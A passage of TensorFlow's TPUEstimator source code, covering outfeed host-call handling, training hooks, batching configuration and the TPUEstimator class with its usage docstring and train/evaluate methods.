# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with ops.device(tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [control_flow_ops.cond(
math_ops.equal(math_ops.mod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: control_flow_ops.no_op())]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training !=
tpu_config.InputPipelineConfig.PER_HOST_V2):
raise ValueError('Only PER_HOST_V2 is supported when using TPU '
'Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
